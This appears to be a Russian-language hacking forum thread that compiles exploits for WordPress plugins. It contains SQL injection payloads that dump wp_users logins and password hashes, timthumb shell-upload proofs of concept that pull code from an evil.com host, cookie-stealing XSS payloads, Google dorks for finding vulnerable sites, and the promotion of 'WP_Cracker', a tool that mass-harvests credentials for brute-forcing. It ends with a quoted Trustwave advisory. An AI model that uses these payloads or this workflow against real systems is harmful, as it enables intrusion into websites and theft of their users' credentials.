easy-color-manager #plugin# shell upload easy-color-manager.php PHP: ... <?php endif; ?> <tr valign="top"> <th scope="row"><?php _e('Upload Image'); ?></th> <td><form enctype="multipart/form-data" id="upload-form" method="post" action=""> <label for="upload"><?php _e('Choose an image from your computer:'); ?></label><br /><input type="file" id="upload" name="body" /><br /> <input type="hidden" name="action" value="save" /> <select name="image-part" id="image-part"> <?php foreach( array_keys( $this->background_part_array ) as $key ){ if( $this->background_part_array[$key]['type'] === 'navigation-02' ){ echo '<option value="'. $key .'-background">'. $this->background_part_array[$key]['name'] .' 背景'; echo '<option value="'. $key .'-panel">'. $this->background_part_array[$key]['name'] .' パネル' ; } else { echo '<option value="'. $key .'">'. $this->background_part_array[$key]['name'] ; } } ?> </select> <?php wp_nonce_field('color-manager-upload', '_wpnonce-color-manager-upload') ?> <input type="submit" class="button" value="<?php esc_attr_e('Upload'); ?>" /><br /> 表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。 </p> </form> </td> ... shell: Code: http://wp/wp-content/plugins/easycolmanager/uploads/shell.php glossy #plugin# sql-inj glossy.admin.addEntry.php PHP: ... $entryName = $_POST['gs_entry_name']; $entryTitle = $_POST['gs_entry_title']; $entryLink = $_POST['gs_entry_link']; $entryDimensions = $_POST['gs_entry_dimensions']; $entryContents = $_POST['gs_entry_contents']; $saveEntry = gs_save_entry($entryName, $entryTitle, $entryLink, $entryDimensions, $entryContents, $pageAction, $entryOriginalName); // If $saveEntry is empty (no errors) and we've been adding, switch to editing mode if (empty($saveEntry)) { $completedAction = $pageAction; $pageAction = "Edit"; $entryOriginalName = $entryName; } ... glossy.admin.addEntry.php PHP: ... } else if ($entryAction == "Add" || $entryName != $entryOriginalName) { $query = $wpdb->prepare("SELECT gs_name FROM ". $gs_tableName ." WHERE gs_name = '%s';", $entryName); $existingName = $wpdb->get_var($query); if ($existingName) { $saveData = false; $errorFields['entryName'] = 'taken'; } } ... exploit: Code: POST: wp-content/plugins/glossy/glossy.admin.addEntry.php data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+ google-button-wp #plugin# passive XSS google.php PHP: ... <form id="lond_per_tree_form" name="form1" method="post" action=""> <div class="postbox"> <h3>'.__("General options", 'menu-test' ).'</h3> <div class="inside"> <table> <tr><td style="width:130px;">'.__("Active share buttons", 'menu-test' ).':</td> <td>'; foreach ($active_buttons as $name => $text) { $checked = ($option['active_buttons'][$name]) ? 'checked="checked"' : ''; $out .= '<div style="width:250px; float:left;"> <input type="checkbox" name="lond_per_tree_active_'.$name.'" '.$checked.' /> ' . __($text, 'menu-test' ).' </div>'; } $out .= '</td></tr> <tr><td>'.__("Show buttons in these pages", 'menu-test' ).':</td> <td>'; foreach ($show_in as $name => $text) { $checked = ($option['show_in'][$name]) ? 'checked="checked"' : ''; $out .= '<div style="width:250px; float:left;"> <input type="checkbox" name="lond_per_tree_show_'.$name.'" '.$checked.' /> ' . __($text, 'menu-test' ).' </div>'; } $out .= '</td></tr> <tr><td>'.__("Position", 'menu-test' ).':</td> <td><select name="lond_per_tree_position"> <option value="above" '.$sel_above.' > '.__('before the post', 'menu-test' ).'</option> <option value="below" '.$sel_below.' > '.__('after the post', 'menu-test' ).'</option> <option value="both" '.$sel_both.' > '.__('before and after the post', 'menu-test' ).'</option> </select> </td></tr> </table> </div> </div> <div class="postbox"> <h3>'.__("Google +1 options", 'menu-test' ).'</h3> <div class="inside"> <table> <tr><td>'.__("Button width", 'menu-test' ).':</td> <td> <input type="text" name="lond_per_tree_google1_width" value="'.stripslashes($option['google1_width']).'" size="10"> px<br /> <span class="description">'.__("default: 90", 'menu-test' ).'</span> </td></tr> <tr><td>'.__("Show counter", 'menu-test' ).':</td> <td> <input type="checkbox" name="lond_per_tree_google1_count" '.$google1_count.' /> </td></tr> </table> </div> </div> <p class="submit"> <input type="submit" name="Submit" class="button-primary" value="'.esc_attr('Save Changes').'" /> </p> </form> ... Vurnel input name "px" ex:<script>alert()</script> polylang #plugin# double sql-inj languages-form.php PHP: ... <form id="add-lang" method="post" action="admin.php?page=mlang&noheader=true" class="validate"> <?php wp_nonce_field('add-lang', '_wpnonce_add-lang'); if ($action=='edit') {?> <input type="hidden" name="action" value="update" /> <input type="hidden" name="lang" value="<?php echo $edit_lang->term_id;?>" /><?php } else { ?> <input type="hidden" name="action" value="add" /><?php }?> <div class="form-field form-required"> <label for="name"><?php _e('Full name', 'polylang');?></label> <input name="name" id="name" type="text" value="<?php if ($action=='edit') echo $edit_lang->name;?>" size="40" aria-required="true" /> <p><?php _e('The name is how it is displayed on your site (for example: English).', 'polylang');?></p> </div> <div class="form-field form-required"> <label for="description"><?php _e('Locale', 'polylang');?></label> <input name="description" id="description" type="text" value="<?php if ($action=='edit') echo $edit_lang->description;?>" size="40" aria-required="true" /> <p><?php _e('Wordpress Locale for the language (for example: en_US). You will need to install the .mo file for this language.', 'polylang');?></p> </div> <div class="form-field"> <label for="slug"><?php _e('Language code', 'polylang');?></label> <input name="slug" id="slug" type="text" value="<?php if ($action=='edit') echo $edit_lang->slug;?>" size="40" /> <p><?php _e('2-letters ISO 639-1 language code (for example: en)', 'polylang');?></p> </div> ... admin.php PHP: ... if (isset($_POST['lang'])) { // Update links to this language in posts and terms in case the slug has been modified $lang = $this->get_language($_POST['lang']); $old_slug = $lang->slug; if ($old_slug != $_POST['slug']) { // update the language slug in posts meta ... exploit #1: Code: POST: wp-contents/plugins/polylang/admin.php data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now uninstall.php PHP: ... $languages = get_terms('language', array('hide_empty'=>false)); foreach ($languages as $lang) { // delete references to this language in all posts $args = array('numberposts'=> -1, 'post_type'=>'any', 'post_status'=>'any'); $posts = get_posts($args); foreach ($posts as $post) { delete_post_meta($post->ID, '_lang-'.$lang->slug); } // delete references to this language in categories & post tags $terms = get_terms(array('category', 'post_tag'), 'get=all'); foreach ($terms as $term) { delete_metadata('term', $term->term_id, '_language'); delete_metadata('term', $term->term_id, '_lang-'.$lang->slug); } // finally delete the language itself wp_delete_term($lang->term_id, 'language'); } // delete the termmeta table only if it is empty as other plugins may use it $table = $wpdb->termmeta; $count = $wpdb->get_var("SELECT COUNT(*) FROM $table WHERE poly_id=$_GET['id']"); if (!$count) { $wpdb->query("DROP TABLE $table;"); unset($wpdb->termmeta); } ... exploit #2: Code: http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--
Code: # Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) --- Description --- The following Wordpress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver. Reference: http://www.exploit-db.com/exploits/17602/ # Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-grid-view-gallery # Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/ # Version: 0.1.1 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php # Plugin: Auto Attachments Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/auto-attachments # Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/ # Version: 0.2.9 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php # Plugin: WP Marketplace Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/wp-marketplace # Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/ # Version: 1.1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php # Plugin: DP Thumbnail Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/dp-thumbnail # Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php # Plugin: Vk Gallery Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/vk-gallery # Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/ # Version: 1.1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php # Plugin: Rekt Slideshow Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rekt-slideshow # Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/ # Version: 1.0.5 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL Must first base64 encode the URL. The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php # Plugin: CAC Featured Content Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cac-featured-content # Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/ # Version: 0.8 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php # Plugin: Rent A Car Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rent-a-car # Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php # Plugin: LISL Last Image Slider Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/lisl-last-image-slider # Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php # Plugin: Islidex Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/islidex # Software Link: http://wordpress.org/extend/plugins/islidex/download/ # Version: 2.7 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php # Plugin: Kino Gallery Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/kino-gallery # Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php # Plugin: Cms Pack Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cms-pack # Software Link: http://wordpress.org/extend/plugins/cms-pack/download/ # Version: 1.3 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php # Plugin: A Gallery Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/a-gallery # Software Link: http://wordpress.org/extend/plugins/a-gallery/download/ # Version: 0.9 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php # Plugin: Category List Portfolio Page Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-list-portfolio-page # Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/ # Version: 0.9 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php # Plugin: Really Easy Slider Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/really-easy-slider # Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/ # Version: 0.1 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php # Plugin: Verve Meta Boxes Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/verve-meta-boxes # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/ # Version: 1.2.8 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php # Plugin: User Avatar Wordpress plugin shell upload vulnerability # Google Dork: inurl:wp-content/plugins/user-avatar # Software Link: http://wordpress.org/extend/plugins/user-avatar/download/ # Version: 1.3.7 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php Requires register_globals to be enabled and at least one user account to have an avatar directory. The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php # Plugin: Extend Wordpress Wordpress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/extend-wordpress # Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/ # Version: 1.3.7 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
Code: # Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability # Date: 2011-09-19 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip # Version: 1.0.31 (tested) # Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check'] --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) e.g. curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php --------------- Vulnerable code --------------- if (!isset($_POST['edit_post_submit'])) { $errormsg = apply_filters('wpwf_check_guestinfo',""); if ($errormsg != "") { $error = true; wp_die($errormsg); } } if($options['forum_captcha'] == true && !$user_ID){ include_once(WPFPATH."captcha/shared.php"); $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail" if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) { // do nothing } else { $error = true; $msg = __("Security code does not match", "mingleforum"); wp_die($msg); } } ... if(isset($_POST['edit_post_submit'])){ $myReplaceSub = array("'", "\\"); $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject'])); $content = $mingleforum->input_filter($_POST['message']); $thread = $mingleforum->check_parms($_POST['thread_id']); $edit_post_id = $_POST['edit_post_id']; if($subject == ""){ $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>"; $msg .= ("<div id='error'><p>".__("You must enter a subject", "mingleforum")."</p></div>"); $error = true; } elseif($content == ""){ $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>"; $msg .= ("<div id='error'><p>".__("You must enter a message", "mingleforum")."</p></div>"); $error = true; } if ($error) wp_die($msg); //SECURITY FIX NEEDED <-- actual author's comment :) $sql = ("UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id"); $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)
WordPress Collision Testimonials plugin <= 3.0 SQL Injection Code: # Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability # Date: 2011-08-26 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: [url]http://downloads.wordpress.org/plugin/collision-testimonials.zip[/url] # Version: 3.0 (tested) # Note: user has to be logged in as "admin" --- PoC --- [url]http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1[/url] AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- Vulnerable code --------------- if (isset($_GET['featQuote'])) { $id = $_GET['id']; mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id"); };
TUBEPRESS Раскрытие путей в Wordpress в плагине Tubepress sait.com/wp-content/plugins/tubepress/classes/org/tubepress/cache/ Code: пример: http://www.slapapp.com/wp-content/plugins/tubepress/classes/org/tubepress/cache/
Fast Secure Contact Form Возможность узнать версию PHP и прочую информацию о сервере при установленном плагине Fast Secure Contact Form 3.0.5 Code: www.site.com/wp-content/plugins/si-contact-form/captcha/test/
Допилил программу товарисча Kuteke по взлому WordPress через багу найденную z0mbyak (за что ему ещё раз спасибо). Точнее, написал с нуля.... Итак, релиз... WP_Cracker How to use: 1) Вбиваем дорк в Google (inurl:"fbconnect_action=myhome") 2) Просто копируем найденную ссылку в буфер 3) Нажимаем Crack It После этого программа всё остальное сделает автоматически за вас, перестроит ссылку как надо для правильного запроса, отпарсит результат или вернёт сообщение о закрытой баге. Чем же хороша эта программа ?? 1) Она не ругается на неправильно забитую ссылку, как у аналога выше. Ссылки автоматически перестраиваются под общий шаблон. Они обрезаются, достраиваются и меняют одни переменные на другие... Программа жрёт любую из этих примеров: (_ttp://www.sie.com/?fbconnect_action=myhome&userid=152&height=400&width=370 _ttp://sitei.info/?fbconnect_action=myhome&userid=51&paged=5 _ttp://www.chipandshelley.com/page/3/?fbconnect_action=myhome&userid=1 ) Так что просто копируйте результат выдачи из гугла и сразу жмите Crack It ! 2) Нечего терять время на удаление дупликатов ! Программа сама автоматически предупредит Вас и не отправит запрос, если вы решите добавить в базу уже добавленный ранее сайт. 3) Базу можно сохранить в отдельный файл, чтобы потом открыть его и продолжить исследования уязвимостей. 4) Можно сохранить отдельно хэши, специально для брута. 5) Можно удалить сайты без уязвимости (кнопка "Clear Nulls"). При этом останутся только сайты с логинами и пассами. 6) Можно копировать отдельный логин и пасс прямо из таблицы, для удобства. 7) Не сильно страшный дизайн и, конечно же, FREEWARE. WP_Cracker 1.1 Собрал в кучу багрепорты и пожелания (отдельное спасибо Osstudio) и, наконец-то, выпускаю вторую и финальную версию WP_Cracker, написанный для баги от z0mbyak Коротко о багфиксах и новых возможностях: 1) ID-шники правильно пересчитывает при удалении "пустышек". 2) Появилась возможность указать файл с линками, который программа сама автоматически чекнет. 3) Исправлен механизм парсинга. Но тут одно НО - программа работает не через потоки, а последовательно отправляя запросы, поэтому не удивляйтесь, если при загрузке файла на 100 линков она зависнет на 2/3/4/5 минут. Как всё чекнет так отвиснет =) Реализации через потоки в публичной версии не будет. Все замечания и пожелания автор получает по асе, указанной в программе, исходники закрыты. И, конечно же, автор не несёт ответственности за использование его программы в незаконных целях =) В архиве ниже лежат обе версии программы, по причине если если у вас слишком медленное подключение к Internet - Вам лучше использовать 1 версию. скачать можно тут или тут Обновил программу, работающую через потоки Для скачивания обращайтесь в ICQ 906zero47 Кратко о новых возможностях: количество потоков от 1 до 100 - Без зависаний - Статистика гудов и бэдов - Отображение прогресса процесса
Версия 1.1 с багой - после адреса домена забывает ставить / слеш / из-за чего есстественно не работает. Все ссылки получаются вида: _unisona.com&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x7e,user_pass)a,7,8,9,10,11,12+from+wp_users-- are not vulnerable
Это не версия с багой, это Вы вставили ссылку без нужных параметров. Нужно, чтобы в ссылке обязательно присутствовала строка "=myhome" иначе, она просто посчитает ссылку невалидной (читай - не будет знать от чего отталкиваться чтоб произвести правильный запрос). В случае с первой версией - там ссылки брались из гугла напрямую, здесь же вы начинаете что-то изобретать...
Ну, во первых, так и надо было писать - что ссылку вставлять целиком. На скринах просвечивает, что написан именно домен, а не вся строка URL. Хотя не понятно зачем оно - раз уж тузла заточена под одну единственную уязвимость не проще ли ей скармливать просто список доменов с WP? И кстати, в режиме браузер вот такая еще бяка: _tp://vipdengi.info/&fbuserid=1+and+ _tp://natasha-bitten.ru/&fbuserid=1+ _tp://www.archmuseum.ru/&fbuserid Хотя по идее тут должен быть знак ?
Боже ж ты мой... Так хочется сказать - Читайте уже наконец-то описание... Ссылки должны быть такого вида: Code: _ttp://vipdengi.info/?fbconnect_action=myhome&userid=51&paged=5 или _ttp://vipdengi.info/?fbconnect_action=myhome&userid=51 или _ttp://vipdengi.info/?fbconnect_action=myhome&fbuserid=51&paged=5 или http://vipdengi.info/?fbconnect_action=myhome&fbuserid=51 или накрайняк такие http://vipdengi.info/?fbconnect_action=myhome Если бы ВНИМАТЕЛЬНО прочли описание к программе - вы бы увидели, что ссылки подготавливаются из запроса в гугла, а после него они как раз подходят под все предоставленные мной примеры.
А как ты определишь парвильный запрос ?? Просто пальцем в небо ?? Пример... Есть сайт xxx.ru и ты знаешь, что он уязвим. Откуда ты узнал ? Да просто увидел ссылку xxx.ru/plugins/new/?fbconnect_action=myhome&userid=56 И ты быстрее копируешь ссылку в текстовик, в надежде скормить его программе, и чтоб она вывела тебе результат. Теперь внимание !!! Уважаемые знатоки, вопрос... Каким хреном программа должна определить что уязвимая ссылка должна выглядеть как xxx.ru/plugins/new/?fbconnect_action=myhome&fbuserid=56+union+select+blablabla ??? Вот для этого программе и скармливаются ПОЛНЫЕ ссылки, а она уже сама всё перестроит и отредактирует. Да. Уважаемый, именно так. Программа всё обрежет и перестроит для вас, просто скормите ей ссылки в том виде, в котором выдал вам Гугл.
# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities 1) Blind SQL Injection in shortcode: Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this: [paywithtweet id="1' AND 1=2"] [paywithtweet id="1' AND 1=1"] 2) Multiple XSS in pay.php Переход... After connecting to twitter: ?link=&22></input>[XSS] After submitting the tweet: ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS] POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script> Качаем... Качаем...
WordPress <= 3.3.1 Multiple Vulnerabilities PHP: Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 ---------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit Request #2 ---------- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: <?php phpinfo(); ?> Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request ------- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query ----------- update wp_comments SET comment_content='<script>alert('123')</script>' where comment_content='Hi, this is a comment.<br />To delete \ a comment, just log in and view the post's comments. There you will have the option to edit or delete them.'; Non-malicious User Visits Wordpress installation and has Javascript executed on their browser Request ------- GET /?p=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page CVE: CVE-2012-0782 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply javascript within the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission button, the javascript is rendered in the client's browser. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server Request ------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Content-Type: application/x-www-form-urlencoded Content-Length: 112 dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit Finding 3: MySQL Server Username/Password Disclosure Vulnerability via 'setup-config.php' page CVE: CVE-2011-4898 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server the database resides on, and a valid MySQL username and password. Malicious users can omit the "dbname" parameter during this process, allowing them to continually bruteforce MySQL instance usernames and passwords. This includes any local or remote MySQL instances which are accessible to the target web server. This can also be used as a method to proxy MySQL bruteforce attacks against other MySQL instances outside of the target organization. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server L.M.N.O = Any MySQL Server for which the Web Server has network access Request ------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Content-Type: application/x-www-form-urlencoded Content-Length: 32 uname=mysql&pwd=mysql&dbhost=L.M.N.O Response (If Password is Valid) ------------------------------- <---snip--> We were able to connect to the database server (which means your username and password is okay) but not able to select the database. <---snip--> Response (If Password is Invalid) --------------------------------- <---snip--> This either means that the username and 